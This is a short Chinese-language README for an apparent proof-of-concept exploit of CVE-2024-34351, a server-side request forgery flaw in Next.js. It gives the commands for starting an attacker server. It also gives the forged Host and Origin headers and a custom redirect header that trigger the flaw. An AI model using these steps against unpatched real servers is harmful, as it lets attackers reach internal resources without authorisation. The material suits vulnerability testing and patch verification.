针对 NextJS SSRF 完整利用的 PoC。攻击者可以利用 CVE-2024-34351 漏洞从 Next.js 服务器获取任意网站内容。
该漏洞已在 [email protected] 中修复。
deno run --allow-net --allow-read attacker-server.ts
python3 attacker-server.py
Host 标头修改为攻击者服务器。(例如 Host: 192.198.0.144:8000)Origin 标头修改为攻击者服务器。(例如 Origin: http://192.198.0.144:8000/)SSRF 的新标头,用于指定重定向目标。(例如 SSRF: http://example.com/test)